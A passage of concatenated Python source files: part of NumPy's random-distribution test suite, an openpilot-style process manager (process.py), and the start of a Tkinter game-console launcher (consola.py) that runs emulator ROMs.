actual = np.random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
np.random.seed(self.seed)
actual = np.random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = np.random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
np.random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, np.random.uniform, throwing_float,
throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
__index__ = __int__
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, np.random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
np.random.seed(self.seed)
actual = np.random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
np.random.seed(self.seed)
r = np.random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
np.testing.assert_(np.isfinite(r).all())
def test_wald(self):
np.random.seed(self.seed)
actual = np.random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
np.random.seed(self.seed)
actual = np.random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
np.random.seed(self.seed)
assert_equal(np.random.weibull(a=0, size=12), np.zeros(12))
assert_raises(ValueError, np.random.weibull, a=-0.)
def test_zipf(self):
np.random.seed(self.seed)
actual = np.random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29],
[1, 1],
[3, 13]])
assert_array_equal(actual, desired)
class TestBroadcast(object):
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def setSeed(self):
np.random.seed(self.seed)
# TODO: Include test for randint once it can broadcast
# Can steal the test written in PR #6938
def test_uniform(self):
low = [0]
high = [1]
uniform = np.random.uniform
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
self.setSeed()
actual = uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
normal = np.random.normal
desired = np.array([2.2129019979039612,
2.1283977976520019,
1.8417114045748335])
self.setSeed()
actual = normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc * 3, bad_scale)
self.setSeed()
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
beta = np.random.beta
desired = np.array([0.19843558305989056,
0.075230336409423643,
0.24976865978980844])
self.setSeed()
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
self.setSeed()
actual = beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a, b * 3)
assert_raises(ValueError, beta, a, bad_b * 3)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
exponential = np.random.exponential
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
std_gamma = np.random.standard_gamma
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
gamma = np.random.gamma
desired = np.array([1.5221370731769048,
1.5277256455738331,
1.4248762625178359])
self.setSeed()
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
self.setSeed()
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
f = np.random.f
desired = np.array([0.80038951638264799,
0.86768719635363512,
2.7251095168386801])
self.setSeed()
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
self.setSeed()
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
nonc_f = np.random.noncentral_f
desired = np.array([9.1393943263705211,
13.025456344595602,
8.8018098359100545])
self.setSeed()
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
self.setSeed()
desired = np.array([6.869638627492048, 0.785880199263955])
actual = np.random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
chisquare = np.random.chisquare
desired = np.array([0.57022801133088286,
0.51947702108840776,
0.1320969254923558])
self.setSeed()
actual = chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
nonc_chi = np.random.noncentral_chisquare
desired = np.array([9.0015599467913763,
4.5804135049718742,
6.0872302432834564])
self.setSeed()
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
self.setSeed()
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
t = np.random.standard_t
desired = np.array([3.0702872575217643,
5.8560725167361607,
1.0274791436474273])
self.setSeed()
actual = t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
vonmises = np.random.vonmises
desired = np.array([2.9883443664201312,
-2.7064099483995943,
-1.8672476700665914])
self.setSeed()
actual = vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu * 3, bad_kappa)
self.setSeed()
actual = vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
pareto = np.random.pareto
desired = np.array([1.1405622680198362,
1.1465519762044529,
1.0389564467453547])
self.setSeed()
actual = pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
weibull = np.random.weibull
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
power = np.random.power
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
laplace = np.random.laplace
desired = np.array([0.067921356028507157,
0.070715642226971326,
0.019290950698972624])
self.setSeed()
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
self.setSeed()
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
gumbel = np.random.gumbel
desired = np.array([0.2730318639556768,
0.26936705726291116,
0.33906220393037939])
self.setSeed()
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
self.setSeed()
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
logistic = np.random.logistic
desired = np.array([0.13152135837586171,
0.13675915696285773,
0.038216792802833396])
self.setSeed()
actual = logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc * 3, bad_scale)
self.setSeed()
actual = logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc, bad_scale * 3)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
lognormal = np.random.lognormal
desired = np.array([9.1422086044848427,
8.4013952870126261,
6.3073234116578671])
self.setSeed()
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
self.setSeed()
actual = lognormal(mean, sigma * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
rayleigh = np.random.rayleigh
desired = np.array([1.2337491937897689,
1.2360119924878694,
1.1936818095781789])
self.setSeed()
actual = rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
wald = np.random.wald
desired = np.array([0.11873681120271318,
0.12450084820795027,
0.9096122728408238])
self.setSeed()
actual = wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean * 3, scale)
assert_raises(ValueError, wald, mean * 3, bad_scale)
self.setSeed()
actual = wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean, scale * 3)
assert_raises(ValueError, wald, mean, bad_scale * 3)
assert_raises(ValueError, wald, 0.0, 1)
assert_raises(ValueError, wald, 0.5, 0.0)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
triangular = np.random.triangular
desired = np.array([2.03339048710429,
2.0347400359389356,
2.0095991069536208])
self.setSeed()
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two,
right)
self.setSeed()
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3,
right)
self.setSeed()
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two,
right * 3)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
binom = np.random.binomial
desired = np.array([1, 1, 1])
self.setSeed()
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
self.setSeed()
actual = binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
neg_binom = np.random.negative_binomial
desired = np.array([1, 0, 1])
self.setSeed()
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
self.setSeed()
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
max_lam = np.random.RandomState()._poisson_lam_max
lam = [1]
bad_lam_one = [-1]
bad_lam_two = [max_lam * 2]
poisson = np.random.poisson
desired = np.array([1, 1, 0])
self.setSeed()
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
zipf = np.random.zipf
desired = np.array([2, 2, 1])
self.setSeed()
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
geom = np.random.geometric
desired = np.array([2, 2, 2])
self.setSeed()
actual = geom(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geom, bad_p_one * 3)
assert_raises(ValueError, geom, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [0]
bad_nsample_two = [4]
hypergeom = np.random.hypergeometric
desired = np.array([1, 1, 1])
self.setSeed()
actual = hypergeom(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
logseries = np.random.logseries
desired = np.array([1, 1, 1])
self.setSeed()
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
class TestThread(object):
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(np.random.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(np.random.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1/6.]*6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput(object):
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (np.random.exponential, np.random.standard_gamma,
np.random.chisquare, np.random.standard_t,
np.random.pareto, np.random.weibull,
np.random.power, np.random.rayleigh,
np.random.poisson, np.random.zipf,
np.random.geometric, np.random.logseries)
probfuncs = (np.random.geometric, np.random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (np.random.uniform, np.random.normal,
np.random.beta, np.random.gamma,
np.random.f, np.random.noncentral_chisquare,
np.random.vonmises, np.random.laplace,
np.random.gumbel, np.random.logistic,
np.random.lognormal, np.random.wald,
np.random.binomial, np.random.negative_binomial)
probfuncs = (np.random.binomial, np.random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
# TODO: Uncomment once randint can broadcast arguments
# def test_randint(self):
# itype = [bool, np.int8, np.uint8, np.int16, np.uint16,
# np.int32, np.uint32, np.int64, np.uint64]
# func = np.random.randint
# high = np.array([1])
# low = np.array([0])
#
# for dt in itype:
# out = func(low, high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low[0], high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low, high[0], dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [np.random.noncentral_f, np.random.triangular,
np.random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
|
process.py
|
import importlib
import os
import signal
import time
import subprocess
from abc import ABC, abstractmethod
from multiprocessing import Process
from setproctitle import setproctitle # pylint: disable=no-name-in-module
import cereal.messaging as messaging
import selfdrive.crash as crash
from common.basedir import BASEDIR
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.swaglog import cloudlog
from selfdrive.hardware import HARDWARE
from cereal import log
WATCHDOG_FN = "/dev/shm/wd_"
ENABLE_WATCHDOG = os.getenv("NO_WATCHDOG") is None
def launcher(proc):
try:
# import the process
mod = importlib.import_module(proc)
# rename the process
setproctitle(proc)
# create new context since we forked
messaging.context = messaging.Context()
# exec the process
mod.main()
except KeyboardInterrupt:
cloudlog.warning("child %s got SIGINT" % proc)
except Exception:
# can't install the crash handler becuase sys.excepthook doesn't play nice
# with threads, so catch it here.
crash.capture_exception()
raise
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
os.execvp(pargs[0], pargs)
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.monotonic()
while time.monotonic() - t < timeout and process.exitcode is None:
time.sleep(0.001)
class ManagerProcess(ABC):
unkillable = False
daemon = False
sigkill = False
proc = None
enabled = True
name = ""
last_watchdog_time = 0
watchdog_max_dt = None
watchdog_seen = False
shutting_down = False
@abstractmethod
def prepare(self):
pass
@abstractmethod
def start(self):
pass
def restart(self):
self.stop()
self.start()
def check_watchdog(self, started):
if self.watchdog_max_dt is None or self.proc is None:
return
try:
fn = WATCHDOG_FN + str(self.proc.pid)
self.last_watchdog_time = int(open(fn).read())
except Exception:
pass
dt = sec_since_boot() - self.last_watchdog_time / 1e9
if dt > self.watchdog_max_dt:
# Only restart while offroad for now
if self.watchdog_seen and ENABLE_WATCHDOG:
cloudlog.error(f"Watchdog timeout for {self.name} (exitcode {self.proc.exitcode}) restarting ({started=})")
self.restart()
else:
self.watchdog_seen = True
def stop(self, retry=True, block=True):
if self.proc is None:
return
if self.proc.exitcode is None:
if not self.shutting_down:
cloudlog.info(f"killing {self.name}")
sig = signal.SIGKILL if self.sigkill else signal.SIGINT
self.signal(sig)
self.shutting_down = True
if not block:
return
join_process(self.proc, 5)
# If process failed to die send SIGKILL or reboot
if self.proc.exitcode is None and retry:
if self.unkillable:
cloudlog.critical(f"unkillable process {self.name} failed to exit! rebooting in 15 if it doesn't die")
join_process(self.proc, 15)
if self.proc.exitcode is None:
cloudlog.critical(f"unkillable process {self.name} failed to die!")
os.system("date >> /data/unkillable_reboot")
os.sync()
HARDWARE.reboot()
raise RuntimeError
else:
cloudlog.info(f"killing {self.name} with SIGKILL")
self.signal(signal.SIGKILL)
self.proc.join()
ret = self.proc.exitcode
cloudlog.info(f"{self.name} is dead with {ret}")
if self.proc.exitcode is not None:
self.shutting_down = False
self.proc = None
return ret
def signal(self, sig):
if self.proc is None:
return
# Don't signal if already exited
if self.proc.exitcode is not None and self.proc.pid is not None:
return
cloudlog.info(f"sending signal {sig} to {self.name}")
os.kill(self.proc.pid, sig)
def get_process_state_msg(self):
state = log.ManagerState.ProcessState.new_message()
state.name = self.name
if self.proc:
state.running = self.proc.is_alive()
state.pid = self.proc.pid or 0
state.exitCode = self.proc.exitcode or 0
return state
class NativeProcess(ManagerProcess):
def __init__(self, name, cwd, cmdline, enabled=True, persistent=False, driverview=False, unkillable=False, sigkill=False, watchdog_max_dt=None):
self.name = name
self.cwd = cwd
self.cmdline = cmdline
self.enabled = enabled
self.persistent = persistent
self.driverview = driverview
self.unkillable = unkillable
self.sigkill = sigkill
self.watchdog_max_dt = watchdog_max_dt
def prepare(self):
pass
def start(self):
# In case we only tried a non blocking stop we need to stop it before restarting
if self.shutting_down:
self.stop()
if self.proc is not None:
return
cwd = os.path.join(BASEDIR, self.cwd)
cloudlog.info("starting process %s" % self.name)
self.proc = Process(name=self.name, target=nativelauncher, args=(self.cmdline, cwd))
self.proc.start()
self.watchdog_seen = False
self.shutting_down = False
class PythonProcess(ManagerProcess):
def __init__(self, name, module, enabled=True, persistent=False, driverview=False, unkillable=False, sigkill=False, watchdog_max_dt=None):
self.name = name
self.module = module
self.enabled = enabled
self.persistent = persistent
self.driverview = driverview
self.unkillable = unkillable
self.sigkill = sigkill
self.watchdog_max_dt = watchdog_max_dt
def prepare(self):
if self.enabled:
cloudlog.info("preimporting %s" % self.module)
importlib.import_module(self.module)
def start(self):
# In case we only tried a non blocking stop we need to stop it before restarting
if self.shutting_down:
self.stop()
if self.proc is not None:
return
cloudlog.info("starting python %s" % self.module)
self.proc = Process(name=self.name, target=launcher, args=(self.module,))
self.proc.start()
self.watchdog_seen = False
self.shutting_down = False
class DaemonProcess(ManagerProcess):
"""Python process that has to stay running accross manager restart.
This is used for athena so you don't lose SSH access when restarting manager."""
def __init__(self, name, module, param_name, enabled=True):
self.name = name
self.module = module
self.param_name = param_name
self.enabled = enabled
self.persistent = True
def prepare(self):
pass
def start(self):
params = Params()
pid = params.get(self.param_name, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if self.module in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % self.name)
proc = subprocess.Popen(['python', '-m', self.module], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(self.param_name, str(proc.pid))
def stop(self, retry=True, block=True):
pass
def ensure_running(procs, started, driverview=False, not_run=None):
if not_run is None:
not_run = []
for p in procs:
if p.name in not_run:
p.stop(block=False)
elif not p.enabled:
p.stop(block=False)
elif p.persistent:
p.start()
elif p.driverview and driverview:
p.start()
elif started:
p.start()
else:
p.stop(block=False)
p.check_watchdog(started)
|
consola.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ###########################################################################
# consola.py
#
# Author: Alejandro Alpizar Lizbeth Viridiana
# Author: Mendoza Rodriguez Luis Alberto
# Author: Montoya Pérez Héctor
#
# Lincence: MIT
#
# Este progra es la interfas grafica de la consola asi como el contralador
# de muchos procesos de la consola.
#
# ###########################################################################
from tkinter import *
from tkinter import ttk
import os
import threading
# función para ejecutar el emulador con el juego seleccionado
def games(juego):
os.system("mednafen /etc/FinalGame/roms/" + juego)
# función para reproducir sonido
def sonido():
os.system("play /etc/FinalGame/Audio.mp3")
threading.Thread(target=sonido).start()
os.system("xrandr -s 1152x864")
# función para salir
def salir():
os.system("sudo shutdown now")
# Creación de la interfaz
###############################################
raiz = Tk()
raiz.title("Consola")
raiz.attributes("-fullscreen",True)
raiz.resizable(1,1)
raiz.config(bg="White")
###############################################
imagen = PhotoImage(file="/etc/FinalGame/Background.png")
Label(raiz, image=imagen, bd=0).pack()
# Boton de ejecución del juego
########################################################################
Button(raiz,text="Batman" ,bg='gold',command=lambda:games("Batman.gbc") ,width=15).place(x=600,y=50,anchor="center")
Button(raiz,text="Bubble Bobble" ,bg='gold',command=lambda:games("BubbleBobble.gbc") ,width=15).place(x=600,y=100,anchor="center")
Button(raiz,text="Tarzan" ,bg='gold',command=lambda:games("Disney_Tarzan.gbc") ,width=15).place(x=600,y=150,anchor="center")
Button(raiz,text="Galaga" ,bg='gold',command=lambda:games("Galaga.gbc") ,width=15).place(x=600,y=200,anchor="center")
Button(raiz,text="Kirby" ,bg='gold',command=lambda:games("KoroKoroKirby.gbc") ,width=15).place(x=600,y=250,anchor="center")
Button(raiz,text="Mega Man" ,bg='gold',command=lambda:games("MegaManXtreme.gbc") ,width=15).place(x=600,y=300,anchor="center")
Button(raiz,text="Monopoly" ,bg='gold',command=lambda:games("Monopoly.gbc") ,width=15).place(x=600,y=350,anchor="center")
